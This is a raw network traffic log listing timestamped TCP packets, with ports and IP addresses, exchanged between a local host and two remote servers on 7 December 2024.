Dec 7, 2024 12:59:16.154580116 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.154644012 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.154836893 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.154892921 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.156923056 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.156975031 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.157078981 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.157124043 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.158893108 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.159028053 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.159082890 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.160878897 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.161117077 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.161191940 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.162852049 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.162918091 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.163075924 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.164489985 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.164891958 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.164962053 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.165101051 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.165163040 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.166986942 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.167038918 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.167385101 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.167432070 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.168967009 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.169025898 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.169156075 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.169214964 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.171053886 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.171335936 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.171386957 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.172992945 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.173240900 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.173307896 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.175009966 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.175072908 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.175199986 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.177141905 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.177213907 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.177390099 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.179076910 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.179127932 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.179246902 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.179295063 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.181118011 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.181298018 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.181365013 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.183146954 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.183298111 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.183365107 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.185169935 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.185235023 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.185398102 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.190561056 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.197195053 CET	443	49702	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:16.197221041 CET	443	49702	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:16.197267056 CET	443	49702	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:16.197298050 CET	49702	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:16.197324038 CET	443	49702	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:16.197339058 CET	49702	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:16.197370052 CET	49702	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:16.211133003 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.211189985 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.211231947 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.211275101 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.212018013 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.212061882 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.212184906 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.212229967 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.214024067 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.214078903 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.214263916 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.214307070 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.216052055 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.216099977 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.216311932 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.216355085 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.218086958 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.218133926 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.218262911 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.218307018 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.220122099 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.220165968 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.220369101 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.220411062 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.222279072 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.222322941 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.222357988 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.222402096 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.224232912 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.224278927 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.224543095 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.224585056 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.226170063 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.226219893 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.226412058 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.226455927 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.228197098 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.228244066 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.228393078 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.228435993 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.230194092 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.230236053 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.230478048 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.230521917 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.232218981 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.232263088 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.232497931 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.232542038 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.272741079 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.272839069 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.272929907 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.272974014 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.273633957 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.273679972 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.273876905 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.273924112 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.275974989 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.276020050 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.276504040 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.276549101 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.276627064 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.276670933 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.278455973 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.278536081 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.278625965 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.278670073 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.280519009 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.280572891 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.280668974 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.280713081 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.282473087 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.282519102 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.282695055 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.282738924 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.284487009 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.284534931 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.284717083 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.284761906 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.286922932 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.286967039 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.287389994 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.287434101 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.288703918 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.288757086 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.288844109 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.288887978 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.290750980 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.290806055 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.290911913 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.290957928 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.292455912 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.292503119 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.292675018 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.292716980 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.294409990 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.294459105 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.294567108 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.294611931 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.296232939 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.296279907 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.296498060 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.296544075 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.297988892 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.298032999 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.298216105 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.298258066 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.299799919 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.299844027 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.299932957 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.299974918 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.301456928 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.301501036 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.301693916 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.301738977 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.303215027 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.303261042 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.303471088 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.303513050 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.304841042 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.304891109 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.305059910 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.306508064 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.306567907 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.306684971 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.308073044 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.308151960 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.308258057 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.308301926 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.309698105 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.309742928 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.337708950 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.337861061 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.337923050 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.338320971 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.338728905 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.338778019 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.339713097 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.339772940 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.339907885 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.341038942 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.341087103 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.341250896 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.342397928 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.342444897 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.342607975 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.343782902 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.343833923 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.344084024 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.344125986 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.345174074 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.345458031 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.345513105 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.346725941 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.347182989 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.347234011 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.347781897 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.348006010 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.348064899 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.349066019 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.349108934 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.349284887 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.350676060 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.350739956 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.351114035 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.351181030 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.351851940 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.351946115 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.352071047 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.352113962 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.352982044 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.353051901 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.353208065 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.354094982 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.354301929 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.354542971 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.354588032 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.355580091 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.355811119 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.355854988 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.357084990 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.357902050 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.357955933 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.358324051 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.358717918 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.358763933 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.359416962 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.359483004 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.359647036 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.360847950 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.360903025 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.361102104 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.362140894 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.362200975 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.362229109 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.365176916 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.379784107 CET	443	49702	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:16.379805088 CET	443	49702	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:16.379901886 CET	49702	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:16.379920006 CET	443	49702	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:16.379966974 CET	49702	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:16.403161049 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.403611898 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.403671980 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.403949022 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.403975010 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.404040098 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.404874086 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.404923916 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.405193090 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.406142950 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.406198025 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.406344891 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.407418013 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.407465935 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.407634020 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.407677889 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.408696890 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.408999920 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.409050941 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.409970045 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.410262108 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.410312891 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.411510944 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.412018061 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.412065029 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.412688017 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.412733078 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.412846088 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.413177013 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.413810015 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.413858891 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.414016962 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.414060116 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.533835888 CET	443	49702	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:16.533853054 CET	443	49702	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:16.533943892 CET	49702	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:16.533956051 CET	443	49702	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:16.539171934 CET	49702	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:16.654588938 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.654603958 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.654655933 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.773289919 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.773313999 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.773458958 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.773720980 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.774054050 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.774930954 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.774947882 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.775010109 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.776114941 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.777257919 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.777271986 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.777319908 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.778425932 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.778439999 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.778630972 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.779781103 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.779793978 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.779849052 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.781256914 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.781272888 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.781310081 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.781342030 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.782191992 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.782207012 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.782218933 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.782243967 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.782272100 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.783129930 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.783145905 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.783185005 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.784326077 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.784379959 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.785489082 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.785506010 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.785548925 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.786631107 CET	80	49701	185.215.113.206	192.168.2.7
